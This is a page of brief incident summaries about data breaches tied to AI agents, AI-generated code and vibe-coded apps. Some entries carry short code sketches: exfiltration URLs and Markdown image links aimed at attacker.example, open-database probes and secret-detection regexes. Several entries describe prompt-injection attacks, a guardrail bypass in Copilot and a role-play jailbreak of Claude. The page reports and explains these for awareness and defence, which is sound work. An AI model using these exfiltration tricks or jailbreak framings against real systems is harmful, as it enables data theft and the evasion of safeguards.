Data Breach Stories

17 disasters tagged #data-breach


Meta's autonomous AI agent triggered a Sev 1 by leaking internal data to the wrong employees

Mar 2026

An autonomous AI agent inside Meta caused a "Sev 1" security incident - the company's second-highest severity classification - when it posted incorrect technical guidance on an internal forum without human approval. An engineer who followed the advice inadvertently granted unauthorized colleagues broad access to sensitive company documents, proprietary code, business strategies, and user-related datasets for approximately two hours. The incident came less than three weeks after a separate episode in which an OpenClaw agent deleted over 200 emails from Meta's director of AI safety.

Facepalm, by AI agent
Sensitive internal documents, proprietary code, business strategies, and user-related datasets exposed to unauthorized Meta employees for approximately two hours
automation, ai-assistant, data-breach, +1 more

AI-assisted code commits leak secrets at double the baseline rate

Mar 2026

GitGuardian's "State of Secrets Sprawl 2026" report found that AI-assisted commits on public GitHub leaked secrets at roughly double the rate of human-only commits - 3.2% versus a 1.5% baseline - while the total number of leaked secrets on GitHub hit 28.65 million in 2025, a 34% year-over-year increase and the largest single-year spike ever recorded. AI-service secrets specifically surged 81%, with eight of the ten fastest-growing leaked secret categories tied to AI services. Over 24,000 secrets were also exposed through public Model Context Protocol (MCP) configurations. The report is essentially a 50-page document explaining that the industry's enthusiasm for AI-assisted development has not been matched by a corresponding enthusiasm for not publishing credentials on the public internet.
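The detection side of this finding can be sketched in a few lines. This is a teaching toy, not GitGuardian's scanner: real secret detection uses hundreds of provider-specific patterns plus entropy analysis, and both regexes below are illustrative.

```python
import re

# Two illustrative detector patterns -- a teaching sketch only.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "generic_api_key": re.compile(
        r"(?i)\b(?:api|secret)[_-]?key\s*[:=]\s*['\"][A-Za-z0-9_\-]{20,}['\"]"),
}

def scan_diff(diff_text):
    """Return (pattern_name, match) pairs found in added lines of a diff."""
    findings = []
    for line in diff_text.splitlines():
        if not line.startswith("+"):   # only scan lines the commit adds
            continue
        for name, pattern in SECRET_PATTERNS.items():
            findings += [(name, m.group(0)) for m in pattern.finditer(line)]
    return findings

diff = '+API_KEY = "abcd1234efgh5678ijkl9012"\n+aws = AKIAIOSFODNN7EXAMPLE\n-old = none'
print(scan_diff(diff))
```

The point of the report is that checks this cheap still catch secrets that AI-assisted commits ship at twice the human baseline.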

Facepalm, by Developer
Industry-wide; 28.65 million secrets leaked on public GitHub in 2025; AI-assisted commits demonstrably more likely to leak credentials than human-only commits
security, data-breach

Study: one in five organizations breached because of their own AI-generated code

Mar 2026

Aikido Security's "State of AI in Security & Development 2026" report - a survey of 450 developers, AppSec engineers, and CISOs across Europe and the US - found that 20% of organizations have suffered a serious security breach directly caused by vulnerabilities in AI-generated code that those organizations deployed into production. Nearly seven in ten respondents reported finding vulnerabilities introduced by AI-written code in their own systems. With roughly a quarter of all production code now written by AI tools, the report documents an industry-wide accountability vacuum: 53% blame security teams, 45% blame the developer who wrote the code, and 42% blame whoever merged it (the figures sum past 100%, so respondents evidently spread the blame around).

Facepalm, by Developer
Industry-wide; 20% of surveyed organizations report serious breaches from their own AI-generated code, rising to 43% in the US
security, automation, data-breach

Lovable-showcased EdTech app found riddled with 16 security flaws exposing 18,000 users

Feb 2026

A security researcher found 16 vulnerabilities - six of them critical - in an EdTech app featured on Lovable's showcase page, which had over 100,000 views and real users from UC Berkeley, UC Davis, and universities across Europe, Africa, and Asia. The AI-generated authentication logic was backwards: it blocked logged-in users while granting anonymous visitors full access. A total of 18,697 user records - including names, emails, and roles - were accessible without authentication, along with the ability to modify student grades, delete accounts, and send bulk emails. Lovable initially closed the researcher's support ticket without response.
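The "backwards authentication" failure is a recognizable bug class: an inverted guard condition. A hypothetical reconstruction - function and field names are illustrative, not the app's actual code:

```python
# Hypothetical reconstruction of the bug class: an inverted auth guard.
def can_view_records_buggy(user):
    if not user.get("authenticated"):
        return True     # anonymous visitor: full access (wrong)
    return False        # logged-in user: blocked (also wrong)

def can_view_records_fixed(user):
    return bool(user.get("authenticated"))

anonymous = {"authenticated": False}
student = {"authenticated": True}
print(can_view_records_buggy(anonymous), can_view_records_buggy(student))   # True False
print(can_view_records_fixed(anonymous), can_view_records_fixed(student))   # False True
```

A single negation flips the access model for every user, which is why this kind of generated code needs an actual test before it ships.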

Facepalm, by AI platform
18,697 user records exposed including students at major universities; student grades modifiable and accounts deletable without authentication
security, data-breach, edtech

Claude Code project files let malicious repositories trigger RCE and steal API keys

Feb 2026

Check Point Research disclosed a set of Claude Code vulnerabilities on February 25, 2026 that let attacker-controlled repositories execute shell commands and exfiltrate Anthropic API credentials through malicious project configuration. The attack abused hooks, MCP server definitions, and environment settings stored in repository files that Claude Code treated as collaborative project configuration. Anthropic patched the issues before public disclosure, but the research showed just how little distance separates "shareable team settings" from "clone this repo and let it run code on your machine."
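The practical defense is to treat tool configuration in an untrusted clone as code. A minimal pre-open audit might look like this - the two paths are examples of the kind of files involved, and a real audit would cover whatever the specific tool version actually reads:

```python
from pathlib import Path
import tempfile

# Example configuration paths an agentic coding tool may execute or
# trust; illustrative, not an exhaustive list for any one tool.
SUSPECT_PATHS = [".claude/settings.json", ".mcp.json"]

def audit_repo(repo):
    """List tool-configuration files present in a freshly cloned repo."""
    repo = Path(repo)
    return [rel for rel in SUSPECT_PATHS if (repo / rel).exists()]

# Demo against a throwaway directory standing in for a cloned repo.
with tempfile.TemporaryDirectory() as d:
    (Path(d) / ".mcp.json").write_text("{}")
    found = audit_repo(d)
print(found)    # ['.mcp.json']
```

Flagging these files before the agent opens the project is the distance between "shareable team settings" and "clone this repo and let it run code on your machine."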

Catastrophic, by AI coding agent
Developers who cloned and opened untrusted repositories in Claude Code faced remote code execution and Anthropic API key theft through project-level configuration files
security, prompt-injection, ai-assistant, +1 more

Infostealer harvests OpenClaw AI agent tokens, crypto keys, and behavioral soul files

Feb 2026

Hudson Rock discovered that Vidar infostealer malware successfully exfiltrated an OpenClaw user's complete agent configuration, including gateway authentication tokens, cryptographic keys for secure operations, and the agent's soul.md behavioral guidelines file. OpenClaw stores these sensitive files in predictable, unencrypted locations accessible to any local process. With stolen gateway tokens, attackers could remotely access exposed OpenClaw instances or impersonate authenticated clients making requests to the AI gateway. Researchers characterized this as marking the transition from stealing browser credentials to harvesting the identities of personal AI agents.

Facepalm, by AI agent platform
Any OpenClaw user infected with commodity infostealers has full agent identity compromised; gateway tokens enable remote impersonation; cryptographic keys and behavioral guidelines exposed
security, data-breach

AI agents leak secrets through messaging app link previews

Feb 2026

PromptArmor demonstrated that AI agents in messaging platforms can exfiltrate sensitive data without any user interaction. Malicious prompts trick AI agents into generating URLs with embedded secrets (API keys, credentials), and the messaging platform's automatic link preview feature fetches these URLs, completing the exfiltration before the user even sees the message. Microsoft Teams with Copilot Studio was the most affected, with Discord, Slack, Telegram, and Snapchat also vulnerable.
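The exfiltration primitive is small enough to sketch. An injected prompt makes the agent emit a link whose query string carries a secret; the platform's preview bot then fetches that URL with no user click. Host and parameter names here are illustrative:

```python
from urllib.parse import urlencode, urlparse, parse_qs

def build_exfil_url(attacker_host, secret):
    """What the injected prompt asks the agent to emit."""
    return f"https://{attacker_host}/t?" + urlencode({"k": secret})

def preview_bot_fetch(url):
    """Stand-in for the platform's link-preview fetcher: the attacker's
    server receives the full query string, secret included."""
    return parse_qs(urlparse(url).query)

url = build_exfil_url("attacker.example", "sk-demo-not-a-real-key")
print(preview_bot_fetch(url))   # {'k': ['sk-demo-not-a-real-key']}
```

The preview fetch completes the leak before the victim even sees the message, which is why "no user interaction" is the headline here.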

Facepalm, by AI agent platform
Organizations using AI agents in messaging platforms; API keys, credentials, and sensitive data exfiltrable without user clicks across Microsoft Teams, Discord, Slack, Telegram, and Snapchat
security, prompt-injection, ai-assistant, +1 more

135,000+ OpenClaw AI agent instances exposed to the internet

Feb 2026

SecurityScorecard's STRIKE team discovered over 135,000 OpenClaw AI agent instances exposed to the public internet due to a default configuration that binds to all network interfaces. Approximately 50,000 instances were vulnerable to known RCE flaws (CVE-2026-25253, CVE-2026-25157, CVE-2026-24763), and over 53,000 were linked to previous breaches. Separately, Bitdefender found approximately 17% of skills in the OpenClaw marketplace were malicious, delivering credential-stealing malware.
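The root cause - a default bind address - is a two-line difference. A minimal illustration of what "binds to all network interfaces" means at the socket level (port 0 just asks the OS for any free port):

```python
import socket

def make_listener(host):
    """Open a TCP listener on the given address."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))   # 0.0.0.0 = every interface; 127.0.0.1 = loopback only
    s.listen()
    return s

exposed = make_listener("0.0.0.0")       # reachable from other hosts
loopback = make_listener("127.0.0.1")    # local processes only
print(exposed.getsockname()[0], loopback.getsockname()[0])
exposed.close(); loopback.close()
```

A loopback default plus an explicit opt-in for network exposure would have kept most of those 135,000 instances off the public internet.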

Catastrophic, by Platform default configuration
135,000+ exposed OpenClaw instances; 50,000+ vulnerable to RCE; attackers gain access to credentials, filesystem, messaging platforms, and personal data
security, supply-chain, automation, +1 more

Study of 1,430 AI-built apps finds 73% have critical security flaws

Feb 2026

A VibeEval scan of 1,430 applications built with AI coding tools found 5,711 security vulnerabilities, with 73% of apps containing at least one critical flaw. The analysis revealed 89% of scanned apps were missing basic security headers, 67% exposed API endpoints or secrets in client-side code, and 23% had JWT authentication bypasses. Apps generated via Replit had roughly twice the vulnerability count compared to those deployed on Vercel. The findings provide large-scale empirical evidence that vibe-coded applications routinely ship with fundamental security gaps.
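The "missing basic security headers" finding is checkable in a few lines. The baseline list below is a common default set, not VibeEval's actual checklist:

```python
# A common baseline of response security headers -- illustrative only.
BASELINE = [
    "Content-Security-Policy",
    "Strict-Transport-Security",
    "X-Content-Type-Options",
    "X-Frame-Options",
]

def missing_headers(response_headers):
    """Return baseline headers absent from a response (case-insensitive)."""
    present = {h.lower() for h in response_headers}
    return [h for h in BASELINE if h.lower() not in present]

print(missing_headers({"Content-Type": "text/html",
                       "X-Frame-Options": "DENY"}))
```

That 89% of scanned apps fail even a check this simple is what makes the result empirical evidence rather than anecdote.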

Facepalm, by Developer
Industry-wide data point covering 1,430 AI-built apps; exposes systemic security gaps in vibe-coded software affecting end users and businesses relying on AI-generated application code
security, automation, data-breach

Vibe-coded Moltbook AI social network exposed 1.5M API keys and 35K emails

Jan 2026

Moltbook, a viral social network built for AI agents to post, comment, and interact, was entirely vibe-coded and shipped with a misconfigured Supabase database granting full read and write access to all platform data. Wiz researchers found a Supabase API key in client-side JavaScript within minutes, exposing 1.5 million API authentication tokens, 35,000 email addresses, and private messages. The database also revealed the platform's claimed 1.5 million agents were controlled by only 17,000 human owners.

Facepalm, by Founder
1.5 million API tokens, 35,000 email addresses, and private messages exposed via unauthenticated database access
security, data-breach

AI chatbot app leaked 300 million private conversations

Jan 2026

Chat & Ask AI, a popular AI chatbot wrapper app with 50+ million users, had a misconfigured Firebase backend that exposed 300 million messages from over 25 million users. The exposed data included complete chat histories with ChatGPT, Claude, and Gemini - including discussions of self-harm, drug production, and hacking. A broader scan found that 103 of 200 iOS apps had similar Firebase misconfigurations.
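This kind of misconfiguration is usually found with the standard probe for a world-readable Firebase Realtime Database: an unauthenticated GET on the database's `/.json` root. A locked-down project answers 401 "Permission denied"; a 200 with real data means the rules allow public reads. The project name below is a placeholder:

```python
def probe_url(project):
    """URL of the unauthenticated probe (project name is a placeholder)."""
    return f"https://{project}.firebaseio.com/.json"

def looks_world_readable(status, body):
    """Interpret the probe response: 200 with data means open read rules."""
    return status == 200 and body not in ("null", "")

print(probe_url("example-app"))
print(looks_world_readable(401, '{"error" : "Permission denied"}'))  # False
```

The broader scan's 103-of-200 figure suggests this probe would still pay for itself across most of the iOS AI-app ecosystem.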

Catastrophic, by Platform Operator
300 million messages from 25+ million users exposed; sensitive personal conversations including self-harm and illegal activity discussions leaked
data-breach, security, ai-assistant

Hacker jailbroke Claude to automate theft of 150 GB from Mexican government agencies

Jan 2026

A hacker bypassed Anthropic Claude's safety guardrails by framing requests as part of a "bug bounty" security program, convincing the AI to act as an "elite hacker" and generate thousands of detailed attack plans with ready-to-execute scripts. When Claude hit guardrail limits, the attacker switched to ChatGPT for lateral movement tactics. The result was 150 GB of stolen data from multiple Mexican federal agencies, including 195 million taxpayer records, voter information, and government employee files. A custom MCP server bridge maintained a growing knowledge base of targets across the intrusion campaign.

Catastrophic, by AI platform
150 GB of sensitive data stolen from multiple Mexican federal agencies including 195 million taxpayer records, voter information, and civil registry files
security, prompt-injection, ai-assistant, +1 more

Reprompt attack enabled one-click data theft from Microsoft Copilot

Jan 2026

Varonis researchers disclosed the Reprompt attack, a chained prompt injection technique that exfiltrated sensitive data from Microsoft Copilot Personal with a single click on a legitimate Copilot URL. The attack exploited the "q" URL parameter to inject instructions, bypassed data-leak guardrails by asking Copilot to repeat actions twice (safeguards only applied to initial requests), and used Copilot's Markdown rendering to silently send stolen data to an attacker-controlled server. No plugins or further user interaction were required, and the attacker maintained control even after the chat was closed. Microsoft patched the issue in its January 2026 security updates.
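The Markdown-rendering leg of the attack rests on a well-known primitive: if an injected prompt can make the assistant emit an image reference whose URL carries stolen text, the client fetches that URL when it renders the reply - no click needed. Host and parameter name here are illustrative, not Varonis's actual payload:

```python
from urllib.parse import quote

def exfil_markdown(attacker_host, stolen_text):
    """Image reference whose URL smuggles stolen text to the attacker;
    rendering the Markdown triggers the request automatically."""
    return f"![x](https://{attacker_host}/log?d={quote(stolen_text)})"

print(exfil_markdown("attacker.example", "profile: alice@example.com"))
```

Blocking untrusted image URLs at render time is the usual mitigation, which is part of what Microsoft's January 2026 fix had to address.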

Facepalm, by AI assistant
Microsoft Copilot Personal users exposed to profile data, conversation history, and file summary exfiltration via a single malicious link
security, prompt-injection, ai-assistant, +1 more

n8n AI workflow platform hit by CVSS 10.0 RCE vulnerability

Jan 2026

The popular AI workflow automation platform n8n disclosed a maximum-severity vulnerability (CVE-2026-21858) allowing unauthenticated remote code execution on self-hosted instances. With over 25,000 n8n hosts exposed to the internet, the flaw enabled attackers to access sensitive files, forge admin sessions, and execute arbitrary commands. This followed two other critical RCE flaws patched in the same period, highlighting systemic security issues in AI automation platforms.

Catastrophic, by Platform Operator
25,000+ internet-exposed n8n instances vulnerable to full system compromise; arbitrary file access, authentication bypass, and command execution possible without authentication
security, automation, data-breach

Vibe-coded dating safety app leaked 72,000 private images and 1.1 million messages to 4chan

Jul 2025

Tea, a women-only dating safety app with over four million users, suffered three data breaches in July 2025 that exposed 72,000 private images - including 13,000 photos of women holding government-issued IDs - and more than 1.1 million private messages containing deeply personal accounts of relationships, trauma, and abuse. The exposed data circulated on 4chan and hacking forums. The app's founder later admitted to building it with contractors and AI tools without personal coding knowledge. Security researchers attributed the breaches to missing authentication, unsecured legacy databases, and development practices that prioritized speed over security. Multiple class-action lawsuits and privacy regulator investigations followed.

Catastrophic, by Executive
72,000 private images including 13,000 government IDs exposed; 1.1 million private messages leaked to hacking forums; 4+ million users affected; class-action lawsuits filed; regulatory investigations opened
data-breach, security, safety

Lovable AI builder shipped apps with public storage buckets

May 2025

Security researcher Matt Palmer discovered that applications generated by Lovable, a vibe-coding platform, shipped with insufficient Supabase Row-Level Security policies that allowed unauthenticated attackers to read and write arbitrary database tables. The vulnerability, tracked as CVE-2025-48757, affected over 170 apps and exposed sensitive data including personal debt amounts, home addresses, API keys, and PII. A separate researcher found 16 vulnerabilities in a single Lovable-hosted app that leaked more than 18,000 people's data. Lovable's response was widely criticized as inadequate.
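The way this class of exposure is probed: a Supabase project's "anon" API key ships in every browser client, so an unauthenticated read through the auto-generated REST layer succeeds whenever Row-Level Security is missing or misconfigured. Project ref, table, and key below are placeholders; the sketch only builds the request:

```python
from urllib.request import Request

def anon_read_request(project_ref, table, anon_key):
    """Build the unauthenticated read a researcher would attempt with
    nothing but the publicly shipped anon key."""
    url = f"https://{project_ref}.supabase.co/rest/v1/{table}?select=*"
    return Request(url, headers={"apikey": anon_key,
                                 "Authorization": f"Bearer {anon_key}"})

req = anon_read_request("abcdefgh", "profiles", "anon-key-placeholder")
print(req.full_url)
```

With correct RLS policies this request returns an empty result; in the affected apps it returned entire tables.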

Facepalm, by Developer
Customer app data and source artifacts exposed until configurations were fixed
security, data-breach

"Zero hand-written code" SaaS app shut down within a week after cascading security failures

Mar 2025

EnrichLead, a sales lead SaaS application whose founder Leo Acevedo publicly boasted was built entirely with Cursor AI and "zero hand-written code," was permanently shut down in March 2025 after attackers exploited a constellation of basic security failures. API keys sat exposed in frontend code. There was no authentication. The database was wide open. There was no rate limiting. No input validation. Attackers bypassed subscriptions, manipulated data, and maxed out API keys - all within two days of Acevedo's viral celebration post. When he tried to use Cursor to fix the problems, the AI "kept breaking other parts of the code." The app was dead within the week. Acevedo has since launched new vibe-coded projects, because some lessons require a second attempt.

Facepalm, by Developer
Complete application shutdown; customer data at risk; API keys maxed out; all user subscriptions bypassed
security, data-breach, product-failure